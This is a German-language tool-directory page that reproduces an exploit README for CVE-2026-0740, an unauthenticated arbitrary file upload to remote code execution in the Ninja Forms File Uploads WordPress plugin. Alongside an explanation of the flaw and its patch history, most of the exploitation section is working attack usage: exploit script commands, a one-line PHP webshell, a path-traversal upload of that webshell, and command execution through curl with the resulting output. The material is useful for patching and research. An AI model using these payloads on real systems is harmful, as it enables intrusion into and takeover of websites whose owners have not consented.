Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0740 — Ninja Forms File Uploads <= 3.3.26 - Nicht authentifizierter beliebiger Datei-Upload zu RCE (CVE-2026-0740) | Kitploit
Tools/GitHubGitHub/whattheslime/cve-2026-0740
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubwhattheslime/cve-2026-0740

CVE-2026-0740

Ninja Forms File Uploads <= 3.3.26 - Nicht authentifizierter beliebiger Datei-Upload zu RCE (CVE-2026-0740)

Repository anzeigen
122vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0740

Ninja Forms File Uploads <= 3.3.26 - Nicht authentifizierter beliebiger Datei-Upload zu RCE

Exploit für CVE-2026-0740 entdeckt von Selim Lanouar (whattheslime).

Eine vollständige technische Analyse finden Sie im vollständigen Artikel auf Lexfos Blog.

Haftungsausschluss

Dieses Repository wird ausschließlich für Forschungs- und Verteidigungszwecke bereitgestellt.

Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen.


Übersicht

Das Ninja Forms - File Uploads Plugin für WordPress ist in allen Versionen bis einschließlich 3.3.26 anfällig für Nicht authentifizierten beliebigen Datei-Upload, der zu Remote Code Execution führt.

Die Schwachstelle wurde ursprünglich in Version 3.3.23 entdeckt und gemeldet. Die Ausnutzung ist bis Version 3.3.24 einfach (keine Validierung des Ziel-Dateinamens). Die Versionen 3.3.25 und 3.3.26 führten aufeinanderfolgende Teil-Patches ein, aber das Problem ist erst in Version vollständig behoben.

3.3.27

Die Angriffskette ist wie folgt:

  1. Ein nicht authentifizierter Benutzer erhält ein gültiges Upload-Nonce über die AJAX-Aktion nf_fu_get_new_nonce mit einer beliebigen field_id.
  2. Der nf_fu_upload-Handler validiert die Erweiterung der hochgeladenen Datei (z. B. image.jpg), erlaubt es dem Client jedoch, den Ziel-Dateinamen über einen POST-Parameter (image_jpg) zu überschreiben.
  3. Der Ziel-Dateiname wird ohne ordnungsgemäße Bereinigung an move_uploaded_file() übergeben, was beliebige Erweiterungen und Pfadnavigation (../) ermöglicht.
Vektor / Erweiterung<= 3.3.243.3.253.3.263.3.27
Pfadnavigation (../)PASS---
.phpPASS---
.phtml, .pharPASSPASS--
.phtPASSPASSPASS-
.html, .svg, .jsPASSPASSPASS-

Siehe den vollständigen Blogbeitrag für die vollständige Erweiterungstabelle und die technische Analyse.


Ausnutzung

Voraussetzungen

  • Ninja Forms Plugin installiert und aktiviert.
  • Ninja Forms - File Uploads Erweiterung installiert und aktiviert (<= 3.3.26).
  • Es ist kein aktives Formular oder bereits vorhandenes Datei-Upload-Feld erforderlich.

Einrichtung

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 CVE-2026-0740.py -h

Datei hochladen (keine Pfadnavigation)

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f test.txt

Die Datei wird nach wp-content/uploads/ninja-forms/tmp/test.txt geschrieben.

Hochladen mit Pfadnavigation (<= 3.3.24)

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f webshell.php -d ../../../webshell.php

Die Datei wird nach wp-content/webshell.php geschrieben.

Hochladen mit benutzerdefiniertem Ziel-Dateinamen

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f evil-htaccess -d .htaccess

Beispiel

root@kitploit:~
# 1. Detect version
httpx -fr -u http://localhost:8000 -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+' 2>/dev/null
http://localhost:8000 [nfpluginsettings.js?ver=3.3.24]

# 2. Write webshell
echo '<?php system($_GET["cmd"]); ?>' > /tmp/slime.php

# 3. Upload
python3 CVE-2026-0740.py -t http://localhost:8000 -f /tmp/slime.php -d ../ws.php
[2026-04-07] [20:20:11] [info] [http://localhost:8000] Fetch nonce for random field_id: 3711569793384815...
[2026-04-07] [20:20:12] [success] [http://localhost:8000] Got ninja-forms-upload nonce: a320b7ed4a
[2026-04-07] [20:20:12] [info] [http://localhost:8000] Uploading slime.php as ../ws.php via POST parameter...
[2026-04-07] [20:20:12] [success] [http://localhost:8000] File uploaded at: http://localhost:8000/wp-content/uploads/ninja-forms/ws.php

# 4. Execute commands
curl http://localhost:8000/wp-content/uploads/ninja-forms/ws.php\?cmd\=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Referenzen

  • Blogbeitrag - Technische Analyse
  • CVE-2026-0740
  • Wordfence - 50.000 WordPress-Seiten betroffen
  • Wordfence - Schwachstellendetails
Tool herunterladen